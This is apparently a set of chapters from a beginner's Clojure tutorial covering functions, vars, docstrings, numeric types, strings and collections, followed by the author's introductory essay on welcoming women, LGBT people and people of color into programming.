We saw in chapter one that Clojure evaluates lists by substituting some other value in their place:

user=> (inc 1) 2

inc takes any number, and is replaced by that number plus one. That sounds an awful lot like a let:

user=> (let [x 1] (+ x 1)) 2

If we bound x to 5 instead of 1, this expression would evaluate to 6. We can think about inc like a let expression, but without particular values provided for the symbols.

(let [x] (+ x 1))

We can’t actually evaluate this program, because there’s no value for x yet. It could be 1, or 4, or 1453. We say that x is unbound, because it has no binding to a particular value. This is the nature of the function: an expression with unbound symbols.

user=> (fn [x] (+ x 1)) #<user$eval293$fn__294 user$eval293$fn__294@663fc37>

Does the name of that function remind you of anything?

user=> inc #<core$inc clojure.core$inc@16bc0b3c>

Almost all verbs in Clojure are functions. Functions represent unrealized computation: expressions which are not yet evaluated, or incomplete. This particular function works just like inc: it’s an expression which has a single unbound symbol, x. When we invoke the function with a particular value, the expressions in the function are evaluated with x bound to that value.

user=> (inc 2) 3 user=> ((fn [x] (+ x 1)) 2) 3

We say that x is this functions argument, or parameter. When Clojure evaluates (inc 2), we say that inc is called with 2, or that 2 is passed to inc. The result of that function invocation is the function’s return value. We say that (inc 2) returns 3.

Fundamentally, functions describe the relationship between arguments and return values: given 1, return 2. Given 2, return 3, and so on. Let bindings describe a similar relationship, but with a specific set of values for those arguments. let is evaluated immediately, whereas fn is evaluated later, when bindings are provided.

There’s a shorthand for writing functions, too: #(+ % 1) is equivalent to (fn [x] (+ x 1)). % takes the place of the first argument to the function. You’ll sometime see %1, %2, etc. used for the first argument, second argument, and so on.

user=> (let [burrito #(list "beans" % "cheese")] (burrito "carnitas")) ("beans" "carnitas" "cheese")

Since functions exist to defer evaluation, there’s no sense in creating and invoking them in the same expression as we’ve done here. What we want is to give names to our functions, so they can be recombined in different ways.

user=> (let [twice (fn [x] (* 2 x))] (+ (twice 1) (twice 3))) 8

Compare that expression to an equivalent, expanded form:

user=> (+ (* 2 1) (* 2 3))

The name twice is gone, and in its place is the same sort of computation–(* 2 something)–written twice. While we could represent our programs as a single massive expression, it’d be impossible to reason about. Instead, we use functions to compact redundant expressions, by isolating common patterns of computation. Symbols help us re-use those functions (and other values) in more than one place. By giving the symbols meaningful names, we make it easier to reason about the structure of the program as a whole; breaking it up into smaller, understandable parts.

This is core pursuit of software engineering: organizing expressions. Almost every programming language is in search of the right tools to break apart, name, and recombine expressions to solve large problems. In Clojure we’ll see one particular set of tools for composing programs, but the underlying ideas will transfer to many other languages.

Vars

We’ve used let to define a symbol within an expression, but what about the default meanings of +, conj, and type? Are they also let bindings? Is the whole universe one giant let?

Well, not exactly. That’s one way to think about default bindings, but it’s brittle. We’d need to wrap our whole program in a new let expression every time we wanted to change the meaning of a symbol. And moreover, once a let is defined, there’s no way to change it. If we want to redefine symbols for everyone–even code that we didn’t write–we need a new construct: a mutable variable.

user=> (def cats 5) #'user/cats user=> (type #'user/cats) clojure.lang.Var

def defines a type of value we haven’t seen before: a var. Vars, like symbols, are references to other values. When evaluated, a symbol pointing to a var is replaced by the var’s corresponding value:

user=> user/cats 5

def also binds the symbol cats (and its globally qualified equivalent user/cats) to that var.

user=> user/cats 5 user=> cats 5

When we said in chapter one that inc, list, and friends were symbols that pointed to functions, that wasn’t the whole story. The symbol inc points to the var #'inc, which in turn points to the function #<core$inc clojure.core$inc@16bc0b3c>. We can see the intermediate var with resolve:

user=> 'inc inc ; the symbol user=> (resolve 'inc) #'clojure.core/inc ; the var user=> (eval 'inc) #<core$inc clojure.core$inc@16bc0b3c> ; the value

Why two layers of indirection? Because unlike the symbol, we can change the meaning of a Var for everyone, globally, at any time.

user=> (def astronauts []) #'user/astronauts user=> (count astronauts) 0 user=> (def astronauts ["Sally Ride" "Guy Bluford"]) #'user/astronauts user=> (count astronauts) 2

Notice that astronauts had two distinct meanings, depending on when we evaluated it. After the first def, astronauts was an empty vector. After the second def, it had one entry.

If this seems dangerous, you’re a smart cookie. Redefining names in this way changes the meaning of expressions everywhere in a program, without warning. Expressions which relied on the value of a Var could suddenly take on new, possibly incorrect, meanings. It’s a powerful tool for experimenting at the REPL, and for updating a running program, but it can have unexpected consequences. Good Clojurists use def to set up a program initially, and only change those definitions with careful thought.

Totally redefining a Var isn’t the only option. There are safer, controlled ways to change the meaning of a Var within a particular part of a program, which we’ll explore later.

Defining functions

Armed with def, we’re ready to create our own named functions in Clojure.

user=> (def half (fn [number] (/ number 2))) #'user/half user=> (half 6) 3

Creating a function and binding it to a var is so common that it has its own form: defn, short for def fn.

user=> (defn half [number] (/ number 2)) #'user/half

Functions don’t have to take an argument. We’ve seen functions which take zero arguments, like (+).

user=> (defn half [] 1/2) #'user/half user=> (half) 1/2

But if we try to use our earlier form with one argument, Clojure complains that the arity–the number of arguments to the function–is incorrect.

user=> (half 10) ArityException Wrong number of args (1) passed to: user$half clojure.lang.AFn.throwArity (AFn.java:437)

To handle multiple arities, functions have an alternate form. Instead of an argument vector and a body, one provides a series of lists, each of which starts with an argument vector, followed by the body.

user=> (defn half ([] 1/2) ([x] (/ x 2))) user=> (half) 1/2 user=> (half 10) 5

Multiple arguments work just like you expect. Just specify an argument vector of two, or three, or however many arguments the function takes.

user=> (defn add [x y] (+ x y)) #'user/add user=> (add 1 2) 3

Some functions can take any number of arguments. For that, Clojure provides &, which slurps up all remaining arguments as a list:

user=> (defn vargs [x y & more-args] {:x x :y y :more more-args}) #'user/vargs user=> (vargs 1) ArityException Wrong number of args (1) passed to: user$vargs clojure.lang.AFn.throwArity (AFn.java:437) user=> (vargs 1 2) {:x 1, :y 2, :more nil} user=> (vargs 1 2 3 4 5) {:x 1, :y 2, :more (3 4 5)}

Note that x and y are mandatory, though there don’t have to be any remaining arguments.

To keep track of what arguments a function takes, why the function exists, and what it does, we usually include a docstring. Docstrings help fill in the missing context around functions, to explain their assumptions, context, and purpose to the world.

(defn launch "Launches a spacecraft into the given orbit by initiating a controlled on-axis burn. Does not automatically stage, but does vector thrust, if the craft supports it." [craft target-orbit] "OK, we don't know how to control spacecraft yet.")

Docstrings are used to automatically generate documentation for Clojure programs, but you can also access them from the REPL.

user=> (doc launch) ------------------------- user/launch ([craft target-orbit]) Launches a spacecraft into the given orbit by initiating a controlled on-axis burn. Does not automatically stage, but does vector thrust, if the craft supports it. nil

doc tells us the full name of the function, the arguments it accepts, and its docstring. This information comes from the #'launch var’s metadata, and is saved there by defn. We can inspect metadata directly with the meta function:

(meta #'launch) {:arglists ([craft target-orbit]), :ns #<Namespace user>, :name launch!, :column 1, :doc "Launches a spacecraft into the given orbit.", :line 1, :file "NO_SOURCE_PATH"}

There’s some other juicy information in there, like the file the function was defined in and which line and column it started at, but that’s not particularly useful since we’re in the REPL, not a file. However, this does hint at a way to answer our motivating question: how does the type function work?

How does type work?

We know that type returns the type of an object:

user=> (type 2) java.lang.long

And that type, like all functions, is a kind of object with its own unique type:

user=> type #<core$type clojure.core$type@39bda9b9> user=> (type type) clojure.core$type

This tells us that type is a particular instance, at memory address 39bda9b9, of the type clojure.core$type. clojure.core is a namespace which defines the fundamentals of the Clojure language, and $type tells us that it’s named type in that namespace. None of this is particularly helpful, though. Maybe we can find out more about the clojure.core$type by asking what its supertypes are:

user=> (supers (type type)) #{clojure.lang.AFunction clojure.lang.IMeta java.util.concurrent.Callable clojure.lang.Fn clojure.lang.AFn java.util.Comparator java.lang.Object clojure.lang.RestFn clojure.lang.IObj java.lang.Runnable java.io.Serializable clojure.lang.IFn}

This is a set of all the types that include type. We say that type is an instance of clojure.lang.AFunction, or that it implements or extends java.util.concurrent.Callable, and so on. Since it’s a member of clojure.lang.IMeta it has metadata, and since it’s a member of clojure.lang.AFn, it’s a function. Just to double check, let’s confirm that type is indeed a function:

user=> (fn? type) true

What about its documentation?

user=> (doc type) ------------------------- clojure.core/type ([x]) Returns the :type metadata of x, or its Class if none nil

Ah, that’s helpful. type can take a single argument, which it calls x. If it has :type metadata, that’s what it returns. Otherwise, it returns the class of x. Let’s take a deeper look at type’s metadata for more clues.

user=> (meta #'type) {:ns #<Namespace clojure.core>, :name type, :arglists ([x]), :column 1, :added "1.0", :static true, :doc "Returns the :type metadata of x, or its Class if none", :line 3109, :file "clojure/core.clj"}

Look at that! This function was first added to Clojure in version 1.0, and is defined in the file clojure/core.clj, on line 3109. We could go dig up the Clojure source code and read its definition there–or we could ask Clojure to do it for us:

user=> (source type) (defn type "Returns the :type metadata of x, or its Class if none" {:added "1.0" :static true} [x] (or (get (meta x) :type) (class x))) nil

Aha! Here, at last, is how type works. It’s a function which takes a single argument x, and returns either :type from its metadata, or (class x).

We can delve into any function in Clojure using these tools:

user=> (source +) (defn + "Returns the sum of nums. (+) returns 0. Does not auto-promote longs, will throw on overflow. See also: +'" {:inline (nary-inline 'add 'unchecked_add) :inline-arities >1? :added "1.2"} ([] 0) ([x] (cast Number x)) ([x y] (. clojure.lang.Numbers (add x y))) ([x y & more] (reduce1 + (+ x y) more))) nil

Almost every function in a programming language is made up of other, simpler functions. +, for instance, is defined in terms of cast, add, and reduce1. Sometimes functions are defined in terms of themselves. + uses itself twice in this definition; a technique called recursion.

At the bottom, though, are certain fundamental constructs below which you can go no further. Core axioms of the language. Lisp calls these "special forms”. def and let are special forms (well–almost: let is a thin wrapper around let*, which is a special form) in Clojure. These forms are defined by the core implementation of the language, and are not reducible to other Clojure expressions.

user=> (source def) Source not found

Some Lisps are written entirely in terms of a few special forms, but Clojure is much less pure. Many functions bottom out in Java functions and types, or, for CLJS, in terms of Javascript. Any time you see an expression like (. clojure.lang.Numbers (add x y)), there’s Java code underneath. Below Java lies the JVM, which might be written in C or C++, depending on which one you use. And underneath C and C++ lie more libraries, the operating system, assembler, microcode, registers, and ultimately, electrons flowing through silicon.

A well-designed language isolates you from details you don’t need to worry about, like which logic gates or registers to use, and lets you focus on the task at hand. Good languages also need to allow escape hatches for performance or access to dangerous functionality, as we saw with Vars. You can write entire programs entirely in terms of Clojure, but sometimes, for performance or to use tools from other languages, you’ll rely on Java. The Clojure code is easy to explore with doc and source, but Java can be more opaque–I usually rely on the java source files and online documentation.

Review

We’ve seen how let associates names with values in a particular expression, and how Vars allow for mutable bindings which apply universally. and whose definitions can change over time. We learned that Clojure verbs are functions, which express the general shape of an expression but with certain values unbound. Invoking a function binds those variables to specific values, allowing evaluation of the function to proceed.

Functions decompose programs into simpler pieces, expressed in terms of one another. Short, meaningful names help us understand what those functions (and other values) mean.

Finally, we learned how to introspect Clojure functions with doc and source, and saw the definition of some basic Clojure functions. The Clojure cheatsheet gives a comprehensive list of the core functions in the language, and is a great starting point when you have to solve a problem but don’t know what functions to use.

We’ll see a broad swath of those functions in Chapter 4: Sequences.

My thanks to Zach Tellman, Kelly Sommers, and Michael R Bernstein for reviewing drafts of this chapter.

We’ve learned the basics of Clojure’s syntax and evaluation model. Now we’ll take a tour of the basic nouns in the language.

Types

We’ve seen a few different values already–for instance, nil, true, false, 1, 2.34, and "meow". Clearly all these things are different values, but some of them seem more alike than others.

For instance, 1 and 2 are very similar numbers; both can be added, divided, multiplied, and subtracted. 2.34 is also a number, and acts very much like 1 and 2, but it’s not quite the same. It’s got decimal points. It’s not an integer. And clearly true is not very much like a number. What is true plus one? Or false divided by 5.3? These questions are poorly defined.

We say that a type is a group of values which work in the same way. It’s a property that some values share, which allows us to organize the world into sets of similar things. 1 + 1 and 1 + 2 use the same addition, which adds together integers. Types also help us verify that a program makes sense: that you can only add together numbers, instead of adding numbers to porcupines.

Types can overlap and intersect each other. Cats are animals, and cats are fuzzy too. You could say that a cat is a member (or sometimes “instance”), of the fuzzy and animal types. But there are fuzzy things like moss which aren’t animals, and animals like alligators that aren’t fuzzy in the slightest.

Other types completely subsume one another. All tabbies are housecats, and all housecats are felidae, and all felidae are animals. Everything which is true of an animal is automatically true of a housecat. Hierarchical types make it easier to write programs which don’t need to know all the specifics of every value; and conversely, to create new types in terms of others. But they can also get in the way of the programmer, because not every useful classification (like “fuzziness”) is purely hierarchical. Expressing overlapping types in a hierarchy can be tricky.

Every language has a type system; a particular way of organizing nouns into types, figuring out which verbs make sense on which types, and relating types to one another. Some languages are strict, and others more relaxed. Some emphasize hierarchy, and others a more ad-hoc view of the world. We call Clojure’s type system strong in that operations on improper types are simply not allowed: the program will explode if asked to subtract a dandelion. We also say that Clojure’s types are dynamic because they are enforced when the program is run, instead of when the program is first read by the computer.

We’ll learn more about the formal relationships between types later, but for now, keep this in the back of your head. It’ll start to hook in to other concepts later.

Integers

Let’s find the type of the number 3:

user=> (type 3) java.lang.Long

So 3 is a java.lang.Long, or a “Long”, for short. Because Clojure is built on top of Java, many of its types are plain old Java types.

Longs, internally, are represented as a group of sixty-four binary digits (ones and zeroes), written down in a particular pattern called signed two’s complement representation. You don’t need to worry about the specifics–there are only two things to remember about longs. First, longs use one bit to store the sign: whether the number is positive or negative. Second, the other 63 bits represent the size of the number. That means the biggest number you can represent with a long is 263 - 1 (the minus one is because of the number 0), and the smallest long is -263.

How big is 263 - 1?

user=> Long/MAX_VALUE 9223372036854775807

That’s a reasonably big number. Most of the time, you won’t need anything bigger, but… what if you did? What happens if you add one to the biggest Long?

user=> (inc Long/MAX_VALUE) ArithmeticException integer overflow clojure.lang.Numbers.throwIntOverflow (Numbers.java:1388)

An error occurs! This is Clojure telling us that something went wrong. The type of error was an ArithmeticException, and its message was “integer overflow”, meaning “this type of number can’t hold a number that big”. The error came from a specific place in the source code of the program: Numbers.java, on line 1388. That’s a part of the Clojure source code. Later, we’ll learn more about how to unravel error messages and find out what went wrong.

The important thing is that Clojure’s type system protected us from doing something dangerous; instead of returning a corrupt value, it aborted evaluation and returned an error.

If you do need to talk about really big numbers, you can use a BigInt: an arbitrary-precision integer. Let’s convert the biggest Long into a BigInt, then increment it:

user=> (inc (bigint Long/MAX_VALUE)) 9223372036854775808N

Notice the N at the end? That’s how Clojure writes arbitrary-precision integers.

user=> (type 5N) clojure.lang.BigInt

There are also smaller numbers.

user=> (type (int 0)) java.lang.Integer user=> (type (short 0)) java.lang.Short user=> (type (byte 0)) java.lang.Byte

Integers are half the size of Longs; they store values in 32 bits. Shorts are 16 bits, and Bytes are 8. That means their biggest values are 231-1, 215-1, and 27-1, respectively.

user=> Integer/MAX_VALUE 2147483647 user=> Short/MAX_VALUE 32767 user=> Byte/MAX_VALUE 127

Fractional numbers

To represent numbers between integers, we often use floating-point numbers, which can represent small numbers with fine precision, and large numbers with coarse precision. Floats use 32 bits, and Doubles use 64. Doubles are the default in Clojure.

user=> (type 1.23) java.lang.Double user=> (type (float 1.23)) java.lang.Float

Floating point math is complicated, and we won’t get bogged down in the details just yet. The important thing to know is floats and doubles are approximations. There are limits to their correctness:

user=> 0.99999999999999999 1.0

To represent fractions exactly, we can use the ratio type:

user=> (type 1/3) clojure.lang.Ratio

Mathematical operations

The exact behavior of mathematical operations in Clojure depends on their types. In general, though, Clojure aims to preserve information. Adding two longs returns a long; adding a double and a long returns a double.

user=> (+ 1 2) 3 user=> (+ 1 2.0) 3.0

3 and 3.0 are not the same number; one is a long, and the other a double. But for most purposes, they’re equivalent, and Clojure will tell you so:

user=> (= 3 3.0) false user=> (== 3 3.0) true

= asks whether all the things that follow are equal. Since floats are approximations, = considers them different from integers. == also compares things, but a little more loosely: it considers integers equivalent to their floating-point representations.

We can also subtract with -, multiply with *, and divide with /.

user=> (- 3 1) 2 user=> (* 1.5 3) 4.5 user=> (/ 1 2) 1/2

Putting the verb first in each list allows us to add or multiply more than one number in the same step:

user=> (+ 1 2 3) 6 user=> (* 2 3 1/5) 6/5

Subtraction with more than 2 numbers subtracts all later numbers from the first. Division divides the first number by all the rest.

user=> (- 5 1 1 1) 2 user=> (/ 24 2 3) 4

By extension, we can define useful interpretations for numeric operations with just a single number:

user=> (+ 2) 2 user=> (- 2) -2 user=> (* 4) 4 user=> (/ 4) 1/4

We can also add or multiply a list of no numbers at all, obtaining the additive and multiplicative identities, respectively. This might seem odd, especially coming from other languages, but we’ll see later that these generalizations make it easier to reason about higher-level numeric operations.

user=> (+) 0 user=> (*) 1

Often, we want to ask which number is bigger, or if one number falls between two others. <= means “less than or equal to”, and asserts that all following values are in order from smallest to biggest.

user=> (<= 1 2 3) true user=> (<= 1 3 2) false

< means “strictly less than”, and works just like <=, except that no two values may be equal.

user=> (<= 1 1 2) true user=> (< 1 1 2) false

Their friends > and >= mean “greater than” and “greater than or equal to”, respectively, and assert that numbers are in descending order.

user=> (> 3 2 1) true user=> (> 1 2 3) false

Also commonly used are inc and dec, which add and subtract one to a number, respectively:

user=> (inc 5) 6 user=> (dec 5) 4

One final note: equality tests can take more than 2 numbers as well.

user=> (= 2 2 2) true user=> (= 2 2 3) false

Strings

We saw that strings are text, surrounded by double quotes, like "foo". Strings in Clojure are, like Longs, Doubles, and company, backed by a Java type:

user=> (type "cat") java.lang.String

We can make almost anything into a string with str. Strings, symbols, numbers, booleans; every value in Clojure has a string representation. Note that nil’s string representation is ""; an empty string.

user=> (str "cat") "cat" user=> (str 'cat) "cat" user=> (str 1) "1" user=> (str true) "true" user=> (str '(1 2 3)) "(1 2 3)" user=> (str nil) ""

str can also combine things together into a single string, which we call “concatenation”.

user=> (str "meow " 3 " times") "meow 3 times"

To look for patterns in text, we can use a regular expression, which is a tiny language for describing particular arrangements of text. re-find and re-matches look for occurrences of a regular expression in a string. To find a cat:

user=> (re-find #"cat" "mystic cat mouse") "cat" user=> (re-find #"cat" "only dogs here") nil

That #"..." is Clojure’s way of writing a regular expression.

With re-matches, you can extract particular parts of a string which match an expression. Here we find two strings, separated by a :. The parentheses mean that the regular expression should capture that part of the match. We get back a list containing the part of the string that matched the first parentheses, followed by the part that matched the second parentheses.

user=> (rest (re-matches #"(.+):(.+)" "mouse:treat")) ("mouse" "treat")

Regular expressions are a powerful tool for searching and matching text, especially when working with data files. Since regexes work the same in most languages, you can use any guide online to learn more. It’s not something you have to master right away; just learn specific tricks as you find you need them. For a deeper guide, try Fitzgerald’s Introducing Regular Expressions.

Booleans and logic

Everything in Clojure has a sort of charge, a truth value, sometimes called “truthiness”. true is positive and false is negative. nil is negative, too.

user=> (boolean true) true user=> (boolean false) false user=> (boolean nil) false

Every other value in Clojure is positive.

user=> (boolean 0) true user=> (boolean 1) true user=> (boolean "hi there") true user=> (boolean str) true

If you’re coming from a C-inspired language, where 0 is considered false, this might be a bit surprising. Likewise, in much of POSIX, 0 is considered success and nonzero values are failures. Lisp allows no such confusion: the only negative values are false and nil.

We can reason about truth values using and, or, and not. and returns the first negative value, or the last value if all are truthy.

user=> (and true false true) false user=> (and true true true) true user=> (and 1 2 3) 3

Similarly, or returns the first positive value.

user=> (or false 2 3) 2 user=> (or false nil) nil

And not inverts the logical sense of a value:

user=> (not 2) false user=> (not nil) true

We’ll learn more about Boolean logic when we start talking about control flow; the way we alter evaluation of a program and express ideas like “if I’m a cat, then meow incessantly”.

Symbols

We saw symbols in the previous chapter; they’re bare strings of characters, like foo or +.

user=> (class 'str) clojure.lang.Symbol

Symbols can have either short or full names. The short name is used to refer to things locally. The fully qualified name is used to refer unambiguously to a symbol from anywhere. If I were a symbol, my name would be “Kyle”, and my full name “Kyle Kingsbury.”

Symbol names are separated with a /. For instance, the symbol str is also present in a family called clojure.core; the corresponding full name is clojure.core/str.

user=> (= str clojure.core/str) true user=> (name 'clojure.core/str) "str"

When we talked about the maximum size of an integer, that was a fully-qualified symbol, too.

(type 'Integer/MAX_VALUE) clojure.lang.Symbol

The job of symbols is to refer to things, to point to other values. When evaluating a program, symbols are looked up and replaced by their corresponding values. That’s not the only use of symbols, but it’s the most common.

Keywords

Closely related to symbols and strings are keywords, which begin with a :. Keywords are like strings in that they’re made up of text, but are specifically intended for use as labels or identifiers. These aren’t labels in the sense of symbols: keywords aren’t replaced by any other value. They’re just names, by themselves.

user=> (type :cat) clojure.lang.Keyword user=> (str :cat) ":cat" user=> (name :cat) "cat"

As labels, keywords are most useful when paired with other values in a collection, like a map. Keywords can also be used as verbs to look up specific values in other data types. We’ll learn more about keywords shortly.

Lists

A collection is a group of values. It’s a container which provides some structure, some framework, for the things that it holds. We say that a collection contains elements, or members. We saw one kind of collection–a list–in the previous chapter.

user=> '(1 2 3) (1 2 3) user=> (type '(1 2 3)) clojure.lang.PersistentList

Remember, we quote lists with a ' to prevent them from being evaluated. You can also construct a list using list:

user=> (list 1 2 3) (1 2 3)

Lists are comparable just like every other value:

user=> (= (list 1 2) (list 1 2)) true

You can modify a list by conjoining an element onto it:

user=> (conj '(1 2 3) 4) (4 1 2 3)

We added 4 to the list–but it appeared at the front. Why? Internally, lists are stored as a chain of values: each link in the chain is a tiny box which holds the value and a connection to the next link. This data structure, called a linked list, offers immediate access to the first element.

user=> (first (list 1 2 3)) 1

But getting to the second element requires an extra hop down the chain

user=> (second (list 1 2 3)) 2

and the third element a hop after that, and so on.

user=> (nth (list 1 2 3) 2) 3

nth gets the element of an ordered collection at a particular index. The first element is index 0, the second is index 1, and so on.

This means that lists are well-suited for small collections, or collections which are read in linear order, but are slow when you want to get arbitrary elements from later in the list. For fast access to every element, we use a vector.

Vectors

Vectors are surrounded by square brackets, just like lists are surrounded by parentheses. Because vectors aren’t evaluated like lists are, there’s no need to quote them:

user=> [1 2 3] [1 2 3] user=> (type [1 2 3]) clojure.lang.PersistentVector

You can also create vectors with vector, or change other structures into vectors with vec:

user=> (vector 1 2 3) [1 2 3] user=> (vec (list 1 2 3)) [1 2 3]

conj on a vector adds to the end, not the start:

user=> (conj [1 2 3] 4) [1 2 3 4]

Our friends first, second, and nth work here too; but unlike lists, nth is fast on vectors. That’s because internally, vectors are represented as a very broad tree of elements, where each part of the tree branches into 32 smaller trees. Even very large vectors are only a few layers deep, which means getting to elements only takes a few hops.

In addition to first, you’ll often want to get the remaining elements in a collection. There are two ways to do this:

user=> (rest [1 2 3]) (2 3) user=> (next [1 2 3]) (2 3)

rest and next both return “everything but the first element”. They differ only by what happens when there are no remaining elements:

user=> (rest [1]) () user=> (next [1]) nil

rest returns logical true, next returns logical false. Each has their uses, but in almost every case they’re equivalent–I interchange them freely.

We can get the final element of any collection with last:

user=> (last [1 2 3]) 3

And figure out how big the vector is with count:

user=> (count [1 2 3]) 3

Because vectors are intended for looking up elements by index, we can also use them directly as verbs:

user=> ([:a :b :c] 1) :b

So we took the vector containing three keywords, and asked “What’s the element at index 1?” Lisp, like most (but not all!) modern languages, counts up from zero, not one. Index 0 is the first element, index 1 is the second element, and so on. In this vector, finding the element at index 1 evaluates to :b.

Finally, note that vectors and lists containing the same elements are considered equal in Clojure:

user=> (= '(1 2 3) [1 2 3]) true

In almost all contexts, you can consider vectors, lists, and other sequences as interchangeable. They only differ in their performance characteristics, and in a few data-structure-specific operations.

Sets

Sometimes you want an unordered collection of values; especially when you plan to ask questions like “does the collection have the number 3 in it?” Clojure, like most languages, calls these collections sets.

user=> #{:a :b :c} #{:a :c :b}

Sets are surrounded by #{...}. Notice that though we gave the elements :a, :b, and :c, they came out in a different order. In general, the order of sets can shift at any time. If you want a particular order, you can ask for it as a list or vector:

user=> (vec #{:a :b :c}) [:a :c :b]

Or ask for the elements in sorted order:

(sort #{:a :b :c}) (:a :b :c)

conj on a set adds an element:

user=> (conj #{:a :b :c} :d) #{:a :c :b :d} user=> (conj #{:a :b :c} :a) #{:a :c :b}

Sets never contain an element more than once, so conjing an element which is already present does nothing. Conversely, one removes elements with disj:

user=> (disj #{"hornet" "hummingbird"} "hummingbird") #{"hornet"}

The most common operation with a set is to check whether something is inside it. For this we use contains?.

user=> (contains? #{1 2 3} 3) true user=> (contains? #{1 2 3} 5) false

Like vectors, you can use the set itself as a verb. Unlike contains?, this expression returns the element itself (if it was present), or nil.

user=> (#{1 2 3} 3) 3 user=> (#{1 2 3} 4) nil

You can make a set out of any other collection with set.

user=> (set [:a :b :c]) #{:a :c :b}

Maps

The last collection on our tour is the map: a data structure which associates keys with values. In a dictionary, the keys are words and the definitions are the values. In a library, keys are call signs, and the books are values. Maps are indexes for looking things up, and for representing different pieces of named information together. Here’s a cat:

user=> {:name "mittens" :weight 9 :color "black"} {:weight 9, :name "mittens", :color "black"}

Maps are surrounded by braces {...}, filled by alternating keys and values. In this map, the three keys are :name, :color, and :weight, and their values are "mittens", "black", and 9, respectively. We can look up the corresponding value for a key with get:

user=> (get {"cat" "meow" "dog" "woof"} "cat") "meow" user=> (get {:a 1 :b 2} :c) nil

get can also take a default value to return instead of nil, if the key doesn’t exist in that map.

user=> (get {:glinda :good} :wicked :not-here) :not-here

Since lookups are so important for maps, we can use a map as a verb directly:

user=> ({"amlodipine" 12 "ibuprofen" 50} "ibuprofen") 50

And conversely, keywords can also be used as verbs, which look themselves up in maps:

user=> (:raccoon {:weasel "queen" :raccoon "king"}) "king"

You can add a value for a given key to a map with assoc.

user=> (assoc {:bolts 1088} :camshafts 3) {:camshafts 3 :bolts 1088} user=> (assoc {:camshafts 3} :camshafts 2) {:camshafts 2}

Assoc adds keys if they aren’t present, and replaces values if they’re already there. If you associate a value onto nil, it creates a new map.

user=> (assoc nil 5 2) {5 2}

You can combine maps together using merge, which yields a map containing all the elements of all given maps, preferring the values from later ones.

user=> (merge {:a 1 :b 2} {:b 3 :c 4}) {:c 4, :a 1, :b 3}

Finally, to remove a value, use dissoc.

user=> (dissoc {:potatoes 5 :mushrooms 2} :mushrooms) {:potatoes 5}

Putting it all together

All these collections and types can be combined freely. As software engineers, we model the world by creating a particular representation of the problem in the program. Having a rich set of values at our disposal allows us to talk about complex problems. We might describe a person:

{:name "Amelia Earhart" :birth 1897 :death 1939 :awards {"US" #{"Distinguished Flying Cross" "National Women's Hall of Fame"} "World" #{"Altitude record for Autogyro" "First to cross Atlantic twice"}}}

Or a recipe:

{:title "Chocolate chip cookies" :ingredients {"flour" [(+ 2 1/4) :cup] "baking soda" [1 :teaspoon] "salt" [1 :teaspoon] "butter" [1 :cup] "sugar" [3/4 :cup] "brown sugar" [3/4 :cup] "vanilla" [1 :teaspoon] "eggs" 2 "chocolate chips" [12 :ounce]}}

Or the Gini coefficients of nations, as measured over time:

{"Afghanistan" {2008 27.8} "Indonesia" {2008 34.1 2010 35.6 2011 38.1} "Uruguay" {2008 46.3 2009 46.3 2010 45.3}}

In Clojure, we compose data structures to form more complex values; to talk about bigger ideas. We use operations like first, nth, get, and contains? to extract specific information from these structures, and modify them using conj, disj, assoc, dissoc, and so on.

We started this chapter with a discussion of types: groups of similar objects which obey the same rules. We learned that bigints, longs, ints, shorts, and bytes are all integers, that doubles and floats are approximations to decimal numbers, and that ratios represent fractions exactly. We learned the differences between strings for text, symbols as references, and keywords as short labels. Finally, we learned how to compose, alter, and inspect collections of elements. Armed with the basic nouns of Clojure, we’re ready to write a broad array of programs.

I’d like to conclude this tour with one last type of value. We’ve inspected dozens of types so far–but what what happens when you turn the camera on itself?

user=> (type type) clojure.core$type

What is this type thing, exactly? What are these verbs we’ve been learning, and where do they come from? This is the central question of chapter three: functions.

This guide aims to introduce newcomers and experienced programmers alike to the beauty of functional programming, starting with the simplest building blocks of software. You’ll need a computer, basic proficiency in the command line, a text editor, and an internet connection. By the end of this series, you’ll have a thorough command of the Clojure programming language.

Who is this guide for?

Science, technology, engineering, and mathematics are deeply rewarding fields, yet few women enter STEM as a career path. Still more are discouraged by a culture which repeatedly asserts that women lack the analytic aptitude for writing software, that they are not driven enough to be successful scientists, that it’s not cool to pursue a passion for structural engineering. Those few with the talent, encouragement, and persistence to break in to science and tech are discouraged by persistent sexism in practice: the old boy’s club of tenure, being passed over for promotions, isolation from peers, and flat-out assault. This landscape sucks. I want to help change it.

Women Who Code, PyLadies, Black Girls Code, RailsBridge, Girls Who Code, Girl Develop It, and Lambda Ladies are just a few of the fantastic groups helping women enter and thrive in software. I wholeheartedly support these efforts.

In addition, I want to help in my little corner of the technical community–functional programming and distributed systems–by making high-quality educational resources available for free. The Jepsen series has been, in part, an effort to share my enthusiasm for distributed systems with beginners of all stripes–but especially for women, LGBT folks, and people of color.

As technical authors, we often assume that our readers are white, that our readers are straight, that our readers are traditionally male. This is the invisible default in US culture, and it’s especially true in tech. People continue to assume on the basis of my software and writing that I’m straight, because well hey, it’s a statistically reasonable assumption.

But I’m not straight. I get called faggot, cocksucker, and sinner. People say they’ll pray for me. When I walk hand-in-hand with my boyfriend, people roll down their car windows and stare. They threaten to beat me up or kill me. Every day I’m aware that I’m the only gay person some people know, and that I can show that not all gay people are effeminate, or hypermasculine, or ditzy, or obsessed with image. That you can be a manicurist or a mathematician or both. Being different, being a stranger in your culture, comes with all kinds of challenges. I can’t speak to everyone’s experience, but I can take a pretty good guess.

At the same time, in the technical community I’ve found overwhelming warmth and support, from people of all stripes. My peers stand up for me every day, and I’m so thankful–especially you straight dudes–for understanding a bit of what it’s like to be different. I want to extend that same understanding, that same empathy, to people unlike myself. Moreover, I want to reassure everyone that though they may feel different, they do have a place in this community.

So before we begin, I want to reinforce that you can program, that you can do math, that you can design car suspensions and fire suppression systems and spacecraft control software and distributed databases, regardless of what your classmates and media and even fellow engineers think. You don’t have to be white, you don’t have to be straight, you don’t have to be a man. You can grow up never having touched a computer and still become a skilled programmer. Yeah, it’s harder–and yeah, people will give you shit, but that’s not your fault and has nothing to do with your ability or your right to do what you love. All it takes to be a good engineer, scientist, or mathematician is your curiosity, your passion, the right teaching material, and putting in the hours.

There’s nothing in this guide that’s just for lesbian grandmas or just for mixed-race kids; bros, you’re welcome here too. There’s nothing dumbed down. We’re gonna go as deep into the ideas of programming as I know how to go, and we’re gonna do it with everyone on board.

No matter who you are or who people think you are, this guide is for you.

Why Clojure?

This book is about how to program. We’ll be learning in Clojure, which is a modern dialect of a very old family of computer languages, called Lisp. You’ll find that many of this book’s ideas will translate readily to other languages; though they may be expressed in different ways.

